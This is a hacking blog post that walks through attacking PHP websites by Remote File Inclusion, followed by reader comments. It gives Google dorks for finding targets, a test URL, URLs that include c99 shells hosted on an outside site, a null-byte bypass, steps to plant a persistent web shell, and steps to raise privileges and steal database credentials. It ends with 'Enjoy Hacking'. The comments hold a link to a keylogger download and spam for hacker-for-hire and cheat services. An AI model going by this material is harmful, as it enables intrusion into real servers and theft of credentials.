How to Hack a Website By Remote File Inclusion ?
|
RFI is one of the popular Web hacking method used by the Hackers in todays world. Remote File Inclusion occurs when a remote file, usually a shell (a graphical interface for browsing remote files and running your own code on a server), is included into a website which allows the hacker to execute server side commands as the current logged on user, and have access to files on the server. With this power the hacker can continue on to use local exploits to escalate his privileges and take over the whole system.
Many servers are vulnerable to this kind of attack because of PHP’s default settings of register_globals and allow_url_fopen being enabled. Although as of PHP 6.0, register_globals has been depreciated and removed, many websites still rely on older versions of PHP to run their web applications. Now let’s go through the steps a hacker would take to exploit this type of vulnerability in a website.
1. First the hacker would find a website that gets its pages via the PHP include() function and is vulnerable to RFI. Many hackers use Google dorks to locate servers vulnerable to RFI. A Google dork is the act of using Google’s provided search tools to help get a specific search result.
2. Website that include pages have a navigation system similar to:
http://target-site.com/index.php?page=PageName
3. To see if a the page is vulnerable, the hacker would try to include a site instead of PageName like the following:
http://target-site.com/index.php?page=http://google.com
4. If the Google homepage shows up on the website, then the hacker knows the website is vulnerable and would continue to include a shell.
5. A couple of the most popular shells are c99 and r57. A hacker would either upload them to a remote server or just use a Google dork to locate them already online and insert them. To find the a shell the hacker would search Google for: inurl:c99.txt. This will display many websites with the shell already up and ready to be included. At the end of the URL make sure to add a ? so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems. The new URL with the shell included would look like:
http://target-site.com/index.php?page=http://site.com/c99.txt?
6. Sometimes the PHP script on the server appends “.php” to the end of every included file. So if you included the shell, it would end up looking like “c99.txt.php” and not work. To get around this, you would add a null byte (%00) to the end of c99.txt. This tells the server to ignore everything after c99.txt.
7. In step one, I told you that hackers use Google dorks to look for sites possibly vulnerable to RFIs. An example of a Google dork would be: allinurl:.php?page=. This looks for URL’s with .php?page= in them. This is only an example and you most likely won’t find any vulnerable sites with that search. You can try switching around the word “page” with other letters and similar words. Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFI vulnerabilities in site content management systems and search for websites that are running that vulnerable web application with a Google dork.
8. If the hacker succeeds in getting the server to parse the shell, he will be presented with a screen similar to the following:
The shell will display information about the remote server and list all the files and directories on it. From here the hacker would find a directory that has read and write privileges and upload the shell but
this time as a .php file so that incase the vulnerability is fixed, he will be able to access it later on.
9. The hacker would next find a way to gain root privileges on the system. He can do this by uploading and running local exploits against the server. He could also search the victim server for configuration files. These files may contain username and passwords for the MYSQL databases and such.
To protect yourself from RFI attacks, simply make sure you are using up-to-date scripts, and make sure you server php.ini file has register_globals and allow_url_fopen disabled.
Enjoy Hacking :D
Join me on Google+
|
Respected Readers :-
|
E njoyed this post very much – So why not you Subscribe to our regular Email Updates ! and stay connected with us forever .
http://www.ziddu.com/download/15533916/Keyloggerbykrackoworld.com.zip.html
ReplyDeletehi karan do you have got banned your adsense account as iam very old viewer of this site First you show your adsense ads but not now why?
ReplyDelete@Anonymous
ReplyDeleteyes anony,i got banned by google adsense.
You have shared a lot of information in this article about Hire A Verified Hacker. I would like to express my gratitude to everyone who contributed to this useful article. Keep posting.
ReplyDeleteThe information in the post you posted here is useful because it contains some of the best information available. Thanks for sharing about undetected paid overwatch hacks. Keep up the good work.
ReplyDeleteThe article you've shared here is fantastic because it provides some excellent information that will be incredibly beneficial to me. Thank you for sharing about Web Security Consulting For Business. Keep up the good work.
ReplyDelete